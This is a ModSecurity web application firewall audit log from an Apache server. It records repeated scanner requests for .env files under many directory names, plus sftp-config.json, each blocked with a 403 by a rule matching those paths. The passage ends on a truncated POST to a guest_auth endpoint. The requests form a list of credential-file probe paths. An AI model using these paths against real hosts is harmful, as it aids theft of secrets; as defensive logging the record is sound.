Action: Intercepted (phase 1)
Stopwatch: 1745036261593698 672 (- - -)
Stopwatch2: 1745036261593698 672; combined=262, p1=227, p2=0, p3=0, p4=0, p5=34, sr=66, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--43191243-Z--
--cc765e16-A--
[19/Apr/2025:11:17:42 +0700] aAMj5g6cTFSgLAHl7Ppq5gAAABQ 103.236.140.4 35872 103.236.140.4 8181
--cc765e16-B--
GET /.env.local HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--cc765e16-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cc765e16-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036262728504 762 (- - -)
Stopwatch2: 1745036262728504 762; combined=301, p1=263, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cc765e16-Z--
--8b36c75f-A--
[19/Apr/2025:11:17:44 +0700] aAMj6A6cTFSgLAHl7Ppq6AAAABg 103.236.140.4 35878 103.236.140.4 8181
--8b36c75f-B--
GET /.env.production HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--8b36c75f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8b36c75f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036264346831 752 (- - -)
Stopwatch2: 1745036264346831 752; combined=358, p1=262, p2=0, p3=0, p4=0, p5=96, sr=107, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8b36c75f-Z--
--492ae06a-A--
[19/Apr/2025:11:17:46 +0700] aAMj6nNa4dA2HllpK_MfwwAAAIM 103.236.140.4 35890 103.236.140.4 8181
--492ae06a-B--
GET /wp-content/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--492ae06a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--492ae06a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036266575751 875 (- - -)
Stopwatch2: 1745036266575751 875; combined=369, p1=323, p2=0, p3=0, p4=0, p5=46, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--492ae06a-Z--
--f557056e-A--
[19/Apr/2025:11:17:47 +0700] aAMj63Na4dA2HllpK_MfxAAAAJc 103.236.140.4 35896 103.236.140.4 8181
--f557056e-B--
GET /application/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--f557056e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f557056e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036267696759 784 (- - -)
Stopwatch2: 1745036267696759 784; combined=333, p1=298, p2=0, p3=0, p4=0, p5=35, sr=98, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f557056e-Z--
--6a5dcf67-A--
[19/Apr/2025:11:17:48 +0700] aAMj7HNa4dA2HllpK_MfxQAAAIk 103.236.140.4 35906 103.236.140.4 8181
--6a5dcf67-B--
GET /app/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--6a5dcf67-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6a5dcf67-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036268957528 845 (- - -)
Stopwatch2: 1745036268957528 845; combined=389, p1=347, p2=0, p3=0, p4=0, p5=42, sr=132, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6a5dcf67-Z--
--a0a4c61d-A--
[19/Apr/2025:11:17:49 +0700] aAMj7Q6cTFSgLAHl7Ppq7AAAAAY 103.236.140.4 35908 103.236.140.4 8181
--a0a4c61d-B--
GET /config/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--a0a4c61d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a0a4c61d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036269910918 903 (- - -)
Stopwatch2: 1745036269910918 903; combined=366, p1=324, p2=0, p3=0, p4=0, p5=42, sr=103, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a0a4c61d-Z--
--8398f572-A--
[19/Apr/2025:11:17:50 +0700] aAMj7nNa4dA2HllpK_MfxwAAAIg 103.236.140.4 35914 103.236.140.4 8181
--8398f572-B--
GET /api/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--8398f572-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8398f572-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036270953249 698 (- - -)
Stopwatch2: 1745036270953249 698; combined=265, p1=230, p2=0, p3=0, p4=0, p5=35, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8398f572-Z--
--c66da717-A--
[19/Apr/2025:11:17:52 +0700] aAMj8A6cTFSgLAHl7Ppq8AAAAAo 103.236.140.4 35926 103.236.140.4 8181
--c66da717-B--
GET /laravel/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--c66da717-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c66da717-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036272747375 756 (- - -)
Stopwatch2: 1745036272747375 756; combined=339, p1=311, p2=0, p3=0, p4=0, p5=27, sr=150, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c66da717-Z--
--c847ce79-A--
[19/Apr/2025:11:17:53 +0700] aAMj8Q6cTFSgLAHl7Ppq8gAAAAw 103.236.140.4 35932 103.236.140.4 8181
--c847ce79-B--
GET /library/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--c847ce79-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c847ce79-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036273607156 827 (- - -)
Stopwatch2: 1745036273607156 827; combined=357, p1=315, p2=0, p3=0, p4=0, p5=41, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c847ce79-Z--
--43efa325-A--
[19/Apr/2025:11:17:54 +0700] aAMj8g6cTFSgLAHl7Ppq9AAAABI 103.236.140.4 35938 103.236.140.4 8181
--43efa325-B--
GET /nextjs-app/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--43efa325-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--43efa325-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036274291485 752 (- - -)
Stopwatch2: 1745036274291485 752; combined=291, p1=255, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--43efa325-Z--
--0e0f2355-A--
[19/Apr/2025:11:17:55 +0700] aAMj8w6cTFSgLAHl7Ppq9QAAABU 103.236.140.4 35940 103.236.140.4 8181
--0e0f2355-B--
GET /node-api/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--0e0f2355-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0e0f2355-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036275115163 790 (- - -)
Stopwatch2: 1745036275115163 790; combined=345, p1=286, p2=0, p3=0, p4=0, p5=59, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0e0f2355-Z--
--5d087948-A--
[19/Apr/2025:11:17:55 +0700] aAMj8w6cTFSgLAHl7Ppq9wAAABY 103.236.140.4 35946 103.236.140.4 8181
--5d087948-B--
GET /vendor/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--5d087948-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5d087948-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036275859093 779 (- - -)
Stopwatch2: 1745036275859093 779; combined=322, p1=285, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5d087948-Z--
--05c3c666-A--
[19/Apr/2025:11:17:57 +0700] aAMj9Q6cTFSgLAHl7Ppq-gAAAAA 103.236.140.4 35954 103.236.140.4 8181
--05c3c666-B--
GET /backend/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--05c3c666-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--05c3c666-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036277436827 697 (- - -)
Stopwatch2: 1745036277436827 697; combined=281, p1=231, p2=0, p3=0, p4=0, p5=49, sr=69, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--05c3c666-Z--
--2368250e-A--
[19/Apr/2025:11:17:58 +0700] aAMj9g6cTFSgLAHl7Ppq_gAAAAc 103.236.140.4 35966 103.236.140.4 8181
--2368250e-B--
GET /myproject/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--2368250e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2368250e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036278905937 673 (- - -)
Stopwatch2: 1745036278905937 673; combined=259, p1=225, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2368250e-Z--
--a794e72d-A--
[19/Apr/2025:11:17:59 +0700] aAMj9w6cTFSgLAHl7PprAAAAAAs 103.236.140.4 35972 103.236.140.4 8181
--a794e72d-B--
GET /.envs/.production/.django HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--a794e72d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a794e72d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036279971957 658 (- - -)
Stopwatch2: 1745036279971957 658; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a794e72d-Z--
--4739ae4b-A--
[19/Apr/2025:11:18:00 +0700] aAMj-A6cTFSgLAHl7PprAgAAAA4 103.236.140.4 35978 103.236.140.4 8181
--4739ae4b-B--
GET /react-app/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--4739ae4b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4739ae4b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036280849855 802 (- - -)
Stopwatch2: 1745036280849855 802; combined=322, p1=289, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4739ae4b-Z--
--b105f258-A--
[19/Apr/2025:11:18:01 +0700] aAMj-Q6cTFSgLAHl7PprAwAAAA8 103.236.140.4 35980 103.236.140.4 8181
--b105f258-B--
GET /react-app/.env.production HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 107.150.0.116
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 107.150.0.116
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0
Accept: */*
--b105f258-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b105f258-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745036281513364 1252 (- - -)
Stopwatch2: 1745036281513364 1252; combined=506, p1=453, p2=0, p3=0, p4=0, p5=53, sr=150, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b105f258-Z--
--3ae4ed2e-A--
[19/Apr/2025:11:46:51 +0700] aAMquw6cTFSgLAHl7PpsdAAAABQ 103.236.140.4 42490 103.236.140.4 8181
--3ae4ed2e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.81.194
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.81.194
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 OPR/40.0.2308.62
Accept-Charset: utf-8
--3ae4ed2e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3ae4ed2e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745038011605525 734 (- - -)
Stopwatch2: 1745038011605525 734; combined=312, p1=280, p2=0, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3ae4ed2e-Z--
--b7f19d08-A--
[19/Apr/2025:13:05:33 +0700] aAM9LQ6cTFSgLAHl7PpyuQAAAAc 103.236.140.4 60712 103.236.140.4 8181
--b7f19d08-B--
GET /sftp-config.json HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 160.250.132.153
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 160.250.132.153
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--b7f19d08-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b7f19d08-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745042733476987 793 (- - -)
Stopwatch2: 1745042733476987 793; combined=359, p1=311, p2=0, p3=0, p4=0, p5=48, sr=132, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b7f19d08-Z--
--42fa7445-A--
[19/Apr/2025:14:54:53 +0700] aANWzUruoUXZj665VUGk8QAAANQ 103.236.140.4 40560 103.236.140.4 8181
--42fa7445-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.223.62.250
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.223.62.250
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--42fa7445-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--42fa7445-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745049293813539 747 (- - -)
Stopwatch2: 1745049293813539 747; combined=316, p1=284, p2=0, p3=0, p4=0, p5=32, sr=101, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--42fa7445-Z--
--cde63e3a-A--
[19/Apr/2025:16:21:00 +0700] aANq_OvDiFC_ir7MDwbkCwAAAEw 103.236.140.4 53712 103.236.140.4 8181
--cde63e3a-B--
POST /guest_auth/guestIsUp.php HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.232.175.188
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.232.175.188
X-Forwarded-Proto: http
Connection: close
--cde63e3a-F--
